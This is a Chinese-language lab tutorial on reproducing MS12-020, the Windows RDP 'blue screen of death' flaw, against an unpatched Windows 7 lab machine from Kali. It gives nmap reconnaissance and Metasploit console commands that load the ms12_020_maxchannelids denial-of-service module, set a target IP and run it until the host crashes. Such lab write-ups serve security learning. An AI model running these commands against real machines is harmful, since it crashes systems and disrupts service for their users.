网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏死亡蓝屏漏洞

前言

本次介绍Windows经典蓝屏漏洞 MS12-020(死亡蓝屏)

一、漏洞介绍

什么是MS12-020 

MS12-020  RDP远程代码执行漏洞,Windows操作系统中的远程桌面协议给用户带来很多便利,同时也产生了很多影响十分严重的漏洞影响很大,

RDP,Remote Desktop Protocol,远程桌面协议,是一个多通道(mutil-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。大部分的Windows、Linux、FreeBSD、Mac OS X都有相应的客户端。服务端听取送到 TCP 3389 端口的数据。

远程桌面的服务端口为3389

二、漏洞复现

1.前期准备

靶机:Windows7 (未打此漏洞补丁的Windows7系统)

攻击机:kali Linux 

2.漏洞复现

靶机信息收集

使用nmap工具扫描靶机 查看靶机开放端口

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏


得知靶机开启3389端口

1.启动msf

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏 

2.搜索ms12-020漏洞模块

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏

使用第一个 搜索模块 探测靶机是否存在此漏洞

use 0

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏 

  1. 查看所需配置

Show options

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏

4.设置IP

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏

出现绿色点说明漏洞存在漏洞

切换到攻击模块

Back

msf6 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options



Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):



   Name    Current Setting  Required  Description

   ----    ---------------  --------  -----------

   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

   RPORT   3389             yes       The target port (TCP)



msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 10.10.10.141

rhosts => 10.10.10.141

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏 

 

靶机已经蓝屏

网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏

 

 

总结

本次介绍了Windows系统经典漏洞 MS12-020 (死亡蓝屏) 总结了漏洞原理和复现过程。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/35562.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注